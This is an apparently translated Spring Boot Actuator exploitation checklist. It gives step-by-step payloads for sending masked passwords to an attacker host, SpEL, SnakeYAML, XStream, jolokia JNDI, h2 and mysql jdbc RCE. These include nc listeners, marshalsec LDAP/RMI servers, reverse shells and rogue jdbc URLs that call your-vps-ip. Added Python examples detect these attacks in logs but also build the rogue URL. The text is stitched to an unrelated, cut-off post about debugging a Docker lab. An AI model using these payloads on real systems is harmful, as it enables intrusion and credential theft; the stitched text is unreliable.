Step 1: find the property name you want

GET the target's /env or /actuator/env, search for ******, and find the name of the property whose value is masked with *.

Step 2: listen for HTTP requests with nc

Listen on port 80 on an Internet-facing server you control:

nc -lvk 80

Step 3: set the eureka.client.serviceUrl.defaultZone property

In http://value:${security.user.password}@your-vps-ip below, replace security.user.password with the masked property name you want;

and replace your-vps-ip with the real IP address of your server.

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"}

Step 4: reload the configuration

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

Step 5: decode the property value

If all goes well, the server nc is listening on receives a request from the target containing an Authorization header like:

Authorization: Basic dmFsdWU6MTIzNDU2

Base64-decode the dmFsdWU6MTIzNDU2 part to get a plaintext like value:123456, where 123456 is the property's value before masking.

0x05: Recovering a password masked with asterisks (method three)

When /env is accessed, Spring Actuator replaces the values of properties whose names contain sensitive keywords (such as password, secret) with * to mask them

Preconditions:

  • Setting a property via POST /env makes the target issue an arbitrary HTTP request to an external address of your choosing
  • The target can reach the attacker's server (outbound requests allowed)

Method:

Referring to issue-1 raised by UUUUnotfound, while the target makes the outbound HTTP request, placeholders in the URL path can carry data out

Step 1: find the property name you want

GET the target's /env or /actuator/env, search for ******, and find the name of the property whose value is masked with *.

Step 2: listen for HTTP requests with nc

Listen on port 80 on an Internet-facing server you control:

nc -lvk 80

Step 3: trigger the outbound HTTP request

  • spring.cloud.bootstrap.location method (also works when the plaintext contains special URL characters):

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password}

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}

  • eureka.client.serviceUrl.defaultZone method (does not work when the plaintext contains special URL characters):

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}

Step 4: reload the configuration

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

0x06: Recovering a password masked with asterisks (method four)

When /env is accessed, Spring Actuator replaces the values of properties whose names contain sensitive keywords (such as password, secret) with * to mask them

Preconditions:

  • A normal GET on the target's /heapdump or /actuator/heapdump endpoint works

Method:

Step 1: find the property name you want

GET the target's /env or /actuator/env, search for ******, and find the name of the property whose value is masked with *.

Step 2: download the JVM heap

The downloaded heapdump file is usually between 50M and 500M, and sometimes larger than 2G

GET the target's /heapdump or /actuator/heapdump endpoint to download the application's live JVM heap

Step 3: use MAT to get the plaintext password from the JVM heap

Following the method in the referenced article, use the Eclipse Memory Analyzer OQL query select * from org.springframework.web.context.support.StandardServletEnvironment to filter and analyse quickly and obtain the plaintext password

Two: Remote code execution

Since Spring Boot related vulnerabilities may be combinations of several component vulnerabilities, some of the names are not very formal; they only need to be distinguishable

0x01: whitelabel error page SpEL RCE

Preconditions:

  • spring boot 1.1.0-1.1.12, 1.2.0-1.2.7, 1.3.0
  • At least one endpoint and parameter name that triggers the Spring Boot default error page is known

Method:

Step 1: find a normally parameterised endpoint

For example, if accessing /article?id=xxx returns a 500 error page, Whitelabel Error Page, then subsequent payloads are tried in the id parameter.

Step 2: evaluate a SpEL expression

Request /article?id=${7*7}; if the error page shows 49, the computed value of 7*7, the target almost certainly has a SpEL expression injection vulnerability.

Convert the string into 0x** Java byte form to make executing arbitrary code easier:

# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

Run the open -a Calculator command

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

Root cause:

  1. Spring Boot errors while handling the parameter value and control enters the org.springframework.util.PropertyPlaceholderHelper class
  2. The parameter value from the URL is then parsed recursively by the parseStringValue method
  3. Anything wrapped in ${} is treated as a SpEL expression by the resolvePlaceholder method of the org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration class and evaluated, causing RCE

Analysis:

SpringBoot SpEL expression injection: analysis and reproduction

Lab environment:

repository/springboot-spel-rce

Normal access:

http://127.0.0.1:9091/article?id=66

Run the open -a Calculator command:

http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
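Everything in this checklist leaves a distinctive trail in the access log: GETs to the sensitive actuator routes listed in 0x02, the POST /env followed by POST /refresh chain behind methods two and three, jolokia operation calls, and ${...} placeholders in query strings such as the ${7*7} probe just described. The Python below is an added detection example, not part of the checklist or the original post; it parses Apache/nginx combined-format lines (a constructed sample using RFC 5737 documentation addresses) and flags those patterns, normalising the 1.x root layout and the 2.x /actuator layout onto one rule set.

```python
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Actuator routes whose mere GET leaks secrets or internals (the 0x02 list); health/info are left alone.
SENSITIVE_READ = ("/env", "/heapdump", "/trace", "/httptrace", "/jolokia", "/mappings", "/beans",
                  "/configprops", "/dump", "/threaddump", "/loggers", "/auditevents", "/sessions")
# Routes where a POST changes runtime state: the env -> refresh/restart chain the methods above rely on.
STATE_CHANGING = ("/env", "/refresh", "/restart", "/shutdown", "/loggers", "/jolokia")

# Constructed sample (RFC 5737 documentation addresses); not a real log.
SAMPLE_LOG = """\
10.0.0.7 - - [13/Apr/2021:19:44:01 +0800] "GET /article?id=66 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Apr/2021:19:44:05 +0800] "GET /actuator/env HTTP/1.1" 200 8231 "-" "python-requests/2.25"
203.0.113.9 - - [13/Apr/2021:19:44:09 +0800] "POST /actuator/env HTTP/1.1" 200 0 "-" "python-requests/2.25"
203.0.113.9 - - [13/Apr/2021:19:44:10 +0800] "POST /actuator/refresh HTTP/1.1" 200 0 "-" "python-requests/2.25"
203.0.113.9 - - [13/Apr/2021:19:44:15 +0800] "GET /article?id=%24%7B7*7%7D HTTP/1.1" 500 1203 "-" "curl/7.68"
198.51.100.4 - - [13/Apr/2021:19:45:00 +0800] "GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/198.51.100.4!/example.xml HTTP/1.1" 200 77 "-" "curl/7.68"
10.0.0.7 - - [13/Apr/2021:19:45:30 +0800] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.20"
"""


def normalise(path: str) -> str:
    """Map the 2.x /actuator/<name> layout onto the 1.x /<name> layout so one rule set covers both."""
    if path.startswith("/actuator/"):
        path = path[len("/actuator"):]
    elif path == "/actuator":
        path = "/"
    return path.rstrip("/") or "/"


def _under(path: str, roots) -> bool:
    return any(path == r or path.startswith(r + "/") for r in roots)


def classify(line: str) -> List[Dict[str, str]]:
    """Return zero or more alerts for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    path = normalise(unquote(parts.path))
    query = unquote(parts.query)  # %24%7B -> ${ : match after decoding, as the server does
    alerts: List[Dict[str, str]] = []

    def add(severity: str, reason: str) -> None:
        alerts.append({"ip": m["ip"], "severity": severity, "method": m["method"],
                       "path": path, "status": m["status"], "reason": reason})

    if path.startswith("/jolokia/exec/"):
        add("high", "jolokia MBean operation invoked over HTTP")
    elif m["method"] == "POST" and _under(path, STATE_CHANGING):
        add("high", "state-changing actuator call")
    elif _under(path, SENSITIVE_READ):
        add("medium", "sensitive actuator endpoint read")

    if "${" in query or "${" in path:
        reason = "placeholder/SpEL probe in request"
        if m["status"] == "500":
            reason += " (error page reached)"
        add("high", reason)
    return alerts


def scan(log_text: str) -> List[Dict[str, str]]:
    return [a for line in log_text.splitlines() for a in classify(line)]


def poisoning_sequences(alerts: List[Dict[str, str]]) -> List[str]:
    """IPs that both wrote a property (POST /env) and reloaded or restarted: the exact chain above."""
    wrote = {a["ip"] for a in alerts if a["method"] == "POST" and a["path"] == "/env"}
    reloaded = {a["ip"] for a in alerts if a["method"] == "POST" and a["path"] in ("/refresh", "/restart")}
    return sorted(wrote & reloaded)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(a["severity"], a["ip"], a["method"], a["path"], "-", a["reason"])
    print("env-poisoning sequence from:", poisoning_sequences(found))
```

The sequence check is the one worth paging on: a single GET /actuator/env may be a scanner, but an address that writes a property and then triggers /refresh has completed the precondition for every refresh-based chain in the sections that follow. Requests whose bodies never reach the access log (the JSON POST payloads) are why the rule keys on method and path rather than content.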

0x02:spring cloud SnakeYAML RCE

Preconditions:

  • POST requests to the target's /env endpoint can set properties
  • POST requests to the target's /refresh endpoint can reload the configuration (spring-boot-starter-actuator present)
  • The spring-cloud-starter version the target depends on is < 1.3.0.RELEASE
  • The target can reach the attacker's HTTP server (outbound requests allowed)

Method:

Step 1: host the yml and jar files

Start a simple HTTP server on a VPS you control, preferably on a common HTTP port (80, 443)

# start an http server quickly with python

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

Place a file with the yml suffix, example.yml, in the web root with the following content:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]

Place a file with the jar suffix, example.jar, in the web root; it contains the code to execute. See yaml-payload for how to write and compile it

Step 2: set the spring.cloud.bootstrap.location property

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}

Step 3: reload the configuration

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

Root cause:

  1. The spring.cloud.bootstrap.location property is set to the URL of an external malicious yml file
  2. refresh makes the target request the yml file from the remote HTTP server and obtain its content
  3. SnakeYAML has a deserialization vulnerability, so parsing the malicious yml content performs the specified actions
  4. First java.net.URL is triggered to fetch the malicious jar from the remote HTTP server
  5. Then the class in the jar that implements the javax.script.ScriptEngineFactory interface is looked up and instantiated
  6. Instantiating that class runs the malicious code, causing RCE

Analysis:

Exploit Spring Boot Actuator: Spring Cloud Env study notes

Lab environment:

repository/springcloud-snakeyaml-rce

Normal access:

http://127.0.0.1:9092/env

0x03:eureka xstream deserialization RCE

Preconditions:

  • POST requests to the target's /env endpoint can set properties
  • POST requests to the target's /refresh endpoint can reload the configuration (spring-boot-starter-actuator present)
  • The target uses eureka-client < 1.8.7 (usually pulled in by the spring-cloud-starter-netflix-eureka-client dependency)
  • The target can reach the attacker's HTTP server (outbound requests allowed)

Method:

Step 1: set up a site that responds with the malicious XStream payload

A Flask-based Python script example that meets the requirements is provided; it uses the python that ships with the target Linux machine to spawn a reverse shell.

Run the script with python on a server you control, adjusting the reverse-shell IP address and port in the script as needed.

Step 2: listen on the reverse-shell port

nc is usually used to listen on the port and wait for the reverse shell

nc -lvp 443

Step 3: set the eureka.client.serviceUrl.defaultZone property

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"}

Step 4: reload the configuration

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

Root cause:

  1. The eureka.client.serviceUrl.defaultZone property is set to the URL of a malicious external eureka server
  2. refresh makes the target request the remote URL, and the fake eureka server set up in advance returns the malicious payload
  3. The target's dependencies parse the payload, triggering XStream deserialization and causing RCE

Analysis:

Spring Boot Actuator: from unauthorised access to getshell

Lab environment:

repository/springboot-eureka-xstream-rce

Normal access:

http://127.0.0.1:9093/env

0x04:jolokia logback JNDI RCE

Preconditions:

  • The target exposes /jolokia or /actuator/jolokia
  • The target uses the jolokia-core dependency (version requirements not yet known) and the relevant MBean is present
  • The target can reach the attacker's HTTP server (outbound requests allowed)

  • JNDI injection depends on the target JDK version: jdk < 6u201/7u191/8u182/11.0.1 (LDAP vector)

Method:

Step 1: check the existing MBeans

Access the /jolokia/list endpoint and check for the keywords ch.qos.logback.classic.jmx.JMXConfigurator and reloadByURL.

Step 2: host the xml file

Start a simple HTTP server on a VPS you control, preferably on a common HTTP port (80, 443)

# start an http server quickly with python

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

Place a file ending in xml, example.xml, in the web root with the following content:

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
</configuration>

Step 3: prepare the Java code to execute

Write the optimised reverse-shell Java example code JNDIObject.java

Compile it in a way compatible with older JDK versions:

javac -source 1.5 -target 1.5 JNDIObject.java

Then copy the generated JNDIObject.class file into the web root from step 2.

Step 4: set up the malicious ldap service

Download marshalsec and start the corresponding ldap service with the following command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389

Step 5: listen on the reverse-shell port

nc is usually used to listen on the port and wait for the reverse shell

nc -lv 443

Step 6: load the logging configuration file from an external URL

⚠️ If the target fetched example.xml and marshalsec also received the target's request, but the target never requested JNDIObject.class, it is most likely because the target's jdk is too new and the JNDI exploitation failed.

Replace your-vps-ip with the real address and access the URL to trigger the vulnerability:

/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml

Root cause:

  1. Accessing the triggering URL directly is equivalent to calling the reloadByURL method of the ch.qos.logback.classic.jmx.JMXConfigurator class through jolokia
  2. The target requests the external logging configuration URL and obtains the malicious xml content
  3. The target parses the xml with saxParser.parse (this is where the xxe comes from)
  4. The xml uses logback's insertFromJNDI tag to set an external JNDI server address
  5. The target requests the malicious JNDI server, leading to JNDI injection and RCE

Analysis:

spring boot actuator rce via jolokia

Lab environment:

repository/springboot-jolokia-logback-rce

Normal access:

http://127.0.0.1:9094/env

0x05:jolokia Realm JNDI RCE

Preconditions:

  • The target exposes /jolokia or /actuator/jolokia
  • The target uses the jolokia-core dependency (version requirements not yet known) and the relevant MBean is present
  • The target can reach the attacker's server (outbound requests allowed)
  • JNDI injection depends on the target JDK version: jdk < 6u141/7u131/8u121 (RMI vector)

Method:

Step 1: check the existing MBeans

Access the /jolokia/list endpoint and check for the keywords type=MBeanFactory and createJNDIRealm.

Step 2: prepare the Java code to execute

Write the optimised reverse-shell Java example code JNDIObject.java

Step 3: host the class file

Start a simple HTTP server on a VPS you control, preferably on a common HTTP port (80, 443)

# start an http server quickly with python

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

Copy the class file compiled in step 2 into the HTTP server's root directory.

Step 4: set up the malicious rmi service

Download marshalsec and start the corresponding rmi service with the following command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389

Step 5: listen on the reverse-shell port

nc is usually used to listen on the port and wait for the reverse shell

nc -lvp 443

Step 6: send the malicious payload

Adjust the target address, RMI address, port and so on in the springboot-realm-jndi-rce.py script as needed, then run it on a server you control.

Root cause:

  1. jolokia is used to call createJNDIRealm and create a JNDIRealm
  2. connectionURL is set to the RMI service URL
  3. contextFactory is set to RegistryContextFactory
  4. The Realm is stopped
  5. The Realm is started, triggering JNDI injection against the specified RMI address and causing RCE

Analysis:

Yet Another Way to Exploit Spring Boot Actuators via Jolokia

Lab environment:

repository/springboot-jolokia-logback-rce

Normal access:

http://127.0.0.1:9094/env

0x06:h2 database query RCE

Preconditions:

  • POST requests to the target's /env endpoint can set properties
  • POST requests to the target's /restart endpoint can restart the application (spring-boot-starter-actuator present)
  • The com.h2database.h2 dependency is present (version requirements not yet known)

Method:

Step 1: set the spring.datasource.hikari.connection-test-query property

⚠️ The 'T5' in the payload below must be given a new name (e.g. T6) after every command execution before it can be created and used again; otherwise the vulnerability will not fire at the next restart of the application

spring 1.x (blind command execution)

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');

spring 2.x (blind command execution)

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

Step 2: restart the application

spring 1.x

POST /restart
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/restart
Content-Type: application/json

Root cause:

  1. The spring.datasource.hikari.connection-test-query property is set to a malicious CREATE ALIAS SQL statement that defines a custom function
  2. The property maps to the HikariCP connection pool's connectionTestQuery setting: the SQL statement executed before a new database connection is handed out
  3. restart restarts the application, which establishes new database connections
  4. If the custom function in the SQL statement has not been executed before, it is executed, causing RCE

Analysis:

remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database

Lab environment:

repository/springboot-h2-database-rce

Normal access:

http://127.0.0.1:9096/actuator/env

0x07:h2 database console JNDI RCE

Preconditions:

  • The com.h2database.h2 dependency is present (version requirements not yet known)
  • The h2 console is enabled in the spring configuration: spring.h2.console.enabled=true
  • The target can reach the attacker's server (outbound requests allowed)
  • JNDI injection depends on the target JDK version: jdk < 6u201/7u191/8u182/11.0.1 (LDAP vector)

Method:

Step 1: access the route to obtain a jsessionid

Access the default h2 console route /h2-console directly; the target redirects to /h2-console/login.jsp?jsessionid=xxxxxx. Note the actual jsessionid=xxxxxx value.

Step 2: prepare the Java code to execute

Write the optimised reverse-shell Java example code JNDIObject.java

Compile it in a way compatible with older JDK versions:

javac -source 1.5 -target 1.5 JNDIObject.java

Then copy the generated JNDIObject.class file into the web root from step 2.

Step 3: host the class file

Start a simple HTTP server on a VPS you control, preferably on a common HTTP port (80, 443)

# start an http server quickly with python

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

Copy the class file compiled in step 2 into the HTTP server's root directory.

Step 4: set up the malicious ldap service

Download marshalsec and start the corresponding ldap service with the following command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389

Step 5: listen on the reverse-shell port

nc is usually used to listen on the port and wait for the reverse shell

nc -lv 443

Step 6: send the request that triggers the JNDI injection

Replace jsessionid=xxxxxx, www.example.com and ldap://your-vps-ip:1389/JNDIObject in the data below as appropriate

POST /h2-console/login.do?jsessionid=xxxxxx
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx

language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password=

Analysis:

Spring Boot + H2 database JNDI injection

Lab environment:

repository/springboot-h2-database-rce

Normal access:

http://127.0.0.1:9096/h2-console

0x08:mysql jdbc deserialization RCE

Preconditions:

  • POST requests to the target's /env endpoint can set properties
  • POST requests to the target's /refresh endpoint can reload the configuration (spring-boot-starter-actuator present)
  • The mysql-connector-java dependency is present in the target environment
  • The target can reach the attacker's server (outbound requests allowed)

Method:

Step 1: inspect the environment dependencies

GET /env or /actuator/env, search the environment variables (classpath) for the mysql-connector-java keyword, and note its version (5.x or 8.x);

Search for and note whether common deserialization gadget dependencies are present in the environment, such as commons-collections, Jdk7u21, Jdk8u20 and so on;

Search for the spring.datasource.url keyword and note its value, so the normal jdbc url can be restored later.

Step 2: set up the malicious rogue mysql server

Run the springboot-jdbc-deserialization-rce.py script on a server you control, and use ysoserial to customise the command to execute:

java -jar ysoserial.jar CommonsCollections3 calc > payload.ser

This generates the deserialization payload file payload.ser in the script's directory for the script to use.

Step 3: set the spring.datasource.url property

⚠️ Changing this property temporarily makes all of the site's normal database services unavailable and affects the business; proceed with caution!

For mysql-connector-java 5.x set the property value to:

jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true

For mysql-connector-java 8.x set the property value to:

jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=<the value for your connector version from above>

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.url","value":"对应属性值"}
步骤四:刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

步骤五:触发数据库查询

尝试访问网站已知的数据库查询的接口,例如: /product/list ,或者寻找其他方式,主动触发源网站进行数据库查询,然后漏洞会被触发

步骤六:恢复正常 jdbc url

反序列化漏洞利用完成后,使用 步骤三 的方法恢复 步骤一 中记录的 spring.datasource.url 的原始 value

漏洞原理:

  1. spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址
  2. refresh 刷新后设置了一个新的 spring.datasource.url 属性值
  3. 当网站进行数据库查询等操作时,会尝试使用恶意 mysql jdbc url 建立新的数据库连接
  4. 然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据
  5. 目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget,造成 RCE 漏洞

漏洞分析:

New-Exploit-Technique-In-Java-Deserialization-Attack

漏洞环境:

需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password,保证可以正常连上 mysql 数据库,否则程序启动时就会报错退出

repository/springboot-mysql-jdbc-rce

正常访问:

http://127.0.0.1:9097/actuator/env

发送完 payload 后触发漏洞:

http://127.0.0.1:9097/product/list
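The Step 1 triage and the Step 3 URL choice, as an added example that is not part of the original post or of the SpringBootVulExploit project. It parses a captured /actuator/env body (the one embedded below is constructed, not a real capture), finds the mysql-connector-java version and gadget libraries on the classpath, builds the Step 3 value for the detected driver line, and, for the defensive side of the same check, reports the parameters in a jdbc:mysql URL that let a rogue server drive the client (useful as a pre-refresh guard or a config linter):

```python
"""Classpath triage and jdbc:mysql URL check for the rogue-MySQL deserialization
technique. Added example, not from the original post or SpringBootVulExploit."""
import json
import re
from urllib.parse import parse_qs

# Constructed Spring Boot 2.x /actuator/env response (not a real capture).
SAMPLE_ENV = json.dumps({
    "activeProfiles": [],
    "propertySources": [
        {"name": "systemProperties", "properties": {"java.class.path": {
            "value": "/app/lib/mysql-connector-java-8.0.19.jar:"
                     "/app/lib/commons-collections-3.2.1.jar:/app/app.jar"}}},
        {"name": "applicationConfig: [classpath:/application.properties]",
         "properties": {"spring.datasource.url": {
             "value": "jdbc:mysql://db:3306/app?useSSL=false&characterEncoding=utf8"}}},
    ],
})


def flatten_env(env_json):
    """Merge all property sources into one dict; the first source defining a key wins, as in Spring."""
    merged = {}
    for source in json.loads(env_json).get("propertySources", []):
        for key, entry in source.get("properties", {}).items():
            merged.setdefault(key, entry.get("value"))
    return merged


def connector_version(classpath):
    """(major, minor, patch) of mysql-connector-java on the classpath, or None if absent (Step 1)."""
    m = re.search(r"mysql-connector-java-(\d+)\.(\d+)\.(\d+)", classpath or "")
    return tuple(int(x) for x in m.groups()) if m else None


GADGET_LIBS = ("commons-collections", "commons-beanutils", "groovy")


def gadget_hints(classpath):
    """Well-known gadget-chain libraries present on the classpath (Step 1)."""
    return [lib for lib in GADGET_LIBS if lib in (classpath or "")]


def rogue_jdbc_url(version, vps_host):
    """Step 3 value for the detected driver line: 5.x and 8.x name the interceptor differently."""
    if version[0] >= 8:
        interceptor = "queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"
    else:
        interceptor = "statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"
    return (f"jdbc:mysql://{vps_host}:3306/mysql?characterEncoding=utf8&useSSL=false"
            f"&{interceptor}&autoDeserialize=true")


# Parameters that let a rogue server drive the client: the defensive side of the check.
BOOLEAN_FLAGS = {"autoDeserialize", "allowLoadLocalInfile", "allowUrlInLocalInfile"}
INTERCEPTOR_KEYS = {"statementInterceptors", "queryInterceptors"}


def risky_jdbc_params(jdbc_url):
    """Set of dangerous parameters in a jdbc:mysql URL; an empty set means the URL is clean."""
    if not jdbc_url or not jdbc_url.startswith("jdbc:mysql://"):
        return set()
    query = jdbc_url.split("?", 1)[1] if "?" in jdbc_url else ""
    params = parse_qs(query, keep_blank_values=True)
    found = {k for k in INTERCEPTOR_KEYS if k in params}
    found |= {k for k in BOOLEAN_FLAGS if params.get(k, ["false"])[-1].lower() == "true"}
    return found


if __name__ == "__main__":
    env = flatten_env(SAMPLE_ENV)
    ver = connector_version(env.get("java.class.path"))
    print("connector:", ver, "gadgets:", gadget_hints(env.get("java.class.path")))
    print("current url risky params:", risky_jdbc_params(env.get("spring.datasource.url")))
    print("rogue url would carry:", risky_jdbc_params(rogue_jdbc_url(ver, "your-vps-ip")))
```

Feed flatten_env() the real /actuator/env body to get the value to save for Step 6; risky_jdbc_params() run over spring.datasource.url in a config review catches the same trick from the other side, because none of those parameters belong in a production datasource URL.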

[Read More]

Recently, while reproducing vulnerabilities in a lab, I came across an environment made of a web container and a db container that have to run together. After pulling the images it kept failing, and with no other way out I had to debug it myself. The result was a let-down, but the process was satisfying, so I wrote it down.

#Starting the services with docker

Enter the folder of the lab environment and bring it up:

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose up -d
Creating network "cve-2020-9402_default" with the default driver
Creating cve-2020-9402_db_1 ... done
Creating cve-2020-9402_web_1 ... done
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 

The web service's port mapping is shown as 0.0.0.0:8000->8000/tcp, so let's just try to reach it:

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps  
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 


bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl 127.0.0.1:8000/vuln
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps       
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 

In the terminal output above, every request to port 8000 gets Empty reply from server. That puzzled me: docker shows the state as Up, so why does the service answer with nothing? (In hindsight: Up only means the entrypoint process, still sitting in wait-for-it.sh, is alive. Nothing inside the container is listening on 8000 yet; Docker's host-side port proxy still accepts the TCP connection and closes it, which curl reports as an empty reply rather than Connection refused.)

#Troubleshooting

#A container with attitude

Still not willing to give up, I looked up the local IP address and tried again:

bin4xin@bin4xin's MacbookPro shiro % ifconfig|grep inet                                                  
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet6 fe80::aede:48ff:fe00:1122%en5 prefixlen 64 scopeid 0x7 
	inet6 fe80::146d:ed67:817a:e134%en0 prefixlen 64 secured scopeid 0x9 
	inet 114.97.221.67 netmask 0xfffffe00 broadcast 114.97.221.255
	inet6 fe80::24e6:3dff:fe1c:7c55%awdl0 prefixlen 64 scopeid 0x10 
	inet6 fe80::24e6:3dff:fe1c:7c55%llw0 prefixlen 64 scopeid 0x11 
	inet6 fe80::9a9a:9906:8f8d:5e0%utun0 prefixlen 64 scopeid 0x12 
	inet6 fe80::8ef2:d44b:f2b0:f37e%utun1 prefixlen 64 scopeid 0x13 

en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 114.97.221.67

bin4xin@bin4xin's MacbookPro shiro % curl http://114.97.221.67:8000/vuln
curl: (7) Failed to connect to 114.97.221.67 port 8000: Connection refused

bin4xin@bin4xin's MacbookPro shiro % docker-compose ps                  
       Name                      Command                 State                 Ports            
